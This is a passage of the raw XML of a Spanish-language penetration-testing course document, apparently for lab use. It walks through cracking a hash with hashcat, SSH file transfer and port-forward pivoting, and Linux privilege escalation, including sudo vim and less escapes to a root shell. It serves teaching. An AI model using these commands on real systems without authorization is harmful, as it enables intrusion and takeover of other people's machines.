              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>3200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD5DD7" w14:paraId="5FCF9481" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8EC"/>
          </w:tcPr>
          <w:p w14:paraId="12A0FC3C" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>$1$...$...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8EC"/>
          </w:tcPr>
          <w:p w14:paraId="44F93D7F" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>MD5-crypt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8EC"/>
          </w:tcPr>
          <w:p w14:paraId="28B917B7" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>500</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD5DD7" w14:paraId="788F248B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="39810E94" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>$6$...$...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="271904F5" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>SHA512-crypt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="05DFDF88" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>1800</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2679D4EB" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AEA0EEB" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Para reconocerlos hay hash-identifier (en Kali) y hashid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704B1526" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A9ABD1B" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A42D14" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B775376"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lastRenderedPageBreak/>
        <w:t>Crackear un SHA-256 de ejemplo con hashcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC984B2" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Tomemos un hash SHA-256 fabricado para el ejercicio (NO usar en la práctica): 5e88...del texto ‘welcome01’. Vamos a verlo de vuelta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D1A73C" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CF48EA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echo -n 'welcome01' | sha256sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D11B5B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9b0061d5d4b1...   -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B763DD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echo '9b0061d5d4b1...' &gt; h.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422E8E89"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hashcat -m 1400 -a 0 h.txt /usr/share/wordlists/rockyou.txt \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1EF12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--quiet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3116B87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9b0061d5d4b1...:welcome01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAF8FC3" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D2B0036" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="F0A22E"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FCECD5"/>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="845209"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>⚠ Si rockyou.txt no contiene la palabra base, prueba reglas: --rules best64 (introduce permutaciones comunes: caps, sufijos, !). Y si aún así no aparece, considera que sea un hash con sal y reformula el ataque (hashcat -m XXXX requiere formato hash:salt).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308B4679" w14:textId="5930D2ED" w:rsidR="00864C57" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="2E7D32"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E7D32"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>✓ Autoevaluación: ¿qué cambia entre crackear un MD5 (-m 0) y un bcrypt (-m 3200)? Tiempo de orden de magnitud para 1.000 candidatas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1B6932"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BLOQUE 6 — SSH Y MOVIMIENTO LATERAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389F89D1"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r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>Conexión básica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D2A6C2" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57"/>
    <w:p w14:paraId="5B76EAE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ssh -p 22022 usuario@10.0.2.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1F2AF6"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ssh -i ~/.ssh/clave_rsa usuario@10.0.2.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C0074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ssh -o StrictHostKeyChecking=no \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE49FB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-o UserKnownHostsFile=/dev/null \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCEFBC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-p 22022 usuario@10.0.2.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDB70B8" w14:textId="589982B1"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útil cuando el host cambia (laboratorios efímeros)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09803843"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r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">Autenticación por </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> sin interactividad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A961F52" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:pStyle w:val="Fuerte1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16FB07B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sshpass -p 'demo123' ssh -p 22022 usuario@10.0.2.2 'hostname; id'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37645CE9" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="204D3787" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Subida y descarga de ficheros:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6059BFB9" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D580A9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scp -P 22022 fichero.txt usuario@10.0.2.2:/tmp/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459A0BF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scp -P 22022 usuario@10.0.2.2:/tmp/loot.tar.gz .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A69DC9E" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A417901"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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>Pivoting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>forwarding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32D38937" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57"/>
    <w:p w14:paraId="3CCC12E0" w14:textId="077A67B1" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Si comprometes un host (A) que tiene visibilidad de otro (B) al que tú no llegas directamente, </w:t>
      </w:r>
      <w:r w:rsidR="00864C57">
        <w:t>tuneliza</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACA1DBA" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BFCEA6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ssh -L 9999:hostB.interna:80 usuario@hostA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BA234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Tras conectarte, http://localhost:9999 sale por hostA → hostB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE81FC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3718E07A"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ssh -D 1080 usuario@hostA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50687C7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Crea un proxy SOCKS5 en localhost:1080 que sale por hostA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537BBA65" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="470AFEFE" w14:textId="1437ADA0" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="2E7D32"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E7D32"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">✓ Autoevaluación: con -L </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E7D32"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8888:internal</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E7D32"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-db:3306 hacia un bastión SSH, ¿qué cadena de mariadb -h ... ejecutas para conectar a la BBDD interna?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE52121"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lastRenderedPageBreak/>
        <w:t>BLOQUE 7 — ESCALADA DE PRIVILEGIOS LINUX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7034B412"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r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>Primeras comprobaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F58024" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57"/>
    <w:p w14:paraId="30ED028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id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F862BB1"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groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2946DF7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sudo -l                  ! qué puedo ejecutar como otro usuario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF6F07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find / -perm -4000 2&gt;/dev/null   ! binarios SUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02737C6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getcap -r / 2&gt;/dev/null  ! capabilities en lugar de SUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2377D189"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cat /etc/crontab &amp;&amp; ls -la /etc/cron.*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AE3A01" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44EC29B9"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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>GTFOBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="33097952" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>https://gtfobins.github.io es el catálogo de referencia: dado un binario común con SUID o permiso sudo, indica cómo abusarlo para obtener una shell, leer ficheros restringidos o cargar bibliotecas. Búsqueda recomendada: nombre del binario + categoría (Shell, File read, Sudo, Capabilities).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8013D6"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Ejemplo neutro — abuso de sudo vim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0585B271" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Imagina que sudo -l te indica:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20810BD6" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="751B474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User demo may run the following commands on host:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328A71C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(root) NOPASSWD: /usr/bin/vim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043B5987" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73E6440A" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vim aparece en GTFOBins. La técnica clásica: lanzar vim como root y salir a una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2268A317" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63CD361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sudo vim -c ':!/bin/sh'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A0A69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id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7824867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uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C483EC1" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A9C47C1" w14:textId="457E8E33"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r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo neutro — sudo </w:t>
      </w:r>
      <w:r w:rsidR="00864C57">
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>les</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D717EC" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0879A88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sudo less /etc/profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E44299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(dentro de less)  !/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FBCC0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id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CE603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uid=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154ED323" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C06AA6D" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="F0A22E"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FCECD5"/>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="845209"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>⚠ La lección NO es ‘memorízate vim y less’. Es ‘cuando veas un binario concedido por sudo, comprueba GTFOBins ANTES de pelear contra él’. Decenas de utilidades de uso diario (awk, find, less, vim, tar, env, perl, python, scp, …) tienen escapadas documentadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C4E0BA" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="2E7D32"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E7D32"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>✓ Autoevaluación: si sudo -l te muestra (root) NOPASSWD: /usr/bin/tar, ¿qué consulta haces en GTFOBins y cómo formularías la línea para ejecutar una shell?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EE2432" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A018AF9" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="022EF696" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6640C7" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64DD287F" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0284600C" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FEF9045"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lastRenderedPageBreak/>
        <w:t>BLOQUE 8 — DOCKER COMO INFRAESTRUCTURA OBJETIVO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647E7584"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r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>Conceptos esenciales que necesitas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B04B2D3" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>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1695"/>
        <w:gridCol w:w="7933"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD5DD7" w14:paraId="4B43614F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0A22E"/>
          </w:tcPr>
          <w:p w14:paraId="626F299C" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Concepto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0A22E"/>
          </w:tcPr>
          <w:p w14:paraId="5D9C2BA6" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Qué significa para el atacante</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD5DD7" w14:paraId="0920076E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8EC"/>
          </w:tcPr>
          <w:p w14:paraId="72F90404" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>bridge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8EC"/>
          </w:tcPr>
          <w:p w14:paraId="561BF202" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Red por defecto. Los contenedores se ven entre sí; el host puede mapear puertos al exterior.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD5DD7" w14:paraId="71E39DB1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2CC9AC20" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>internal: true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4FDD250F" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Red AISLADA: los contenedores no salen hacia Internet ni reciben tráfico del host.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD5DD7" w14:paraId="1CDEC36F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8EC"/>
          </w:tcPr>
          <w:p w14:paraId="4425890F" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>DNS interno</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8EC"/>
          </w:tcPr>
          <w:p w14:paraId="6F07E4BB" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Docker resuelve nombres de servicio (web, db, api) dentro de la red — útil para enumerar desde un contenedor comprometido.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD5DD7" w14:paraId="0878E8D9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="28FC4993" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
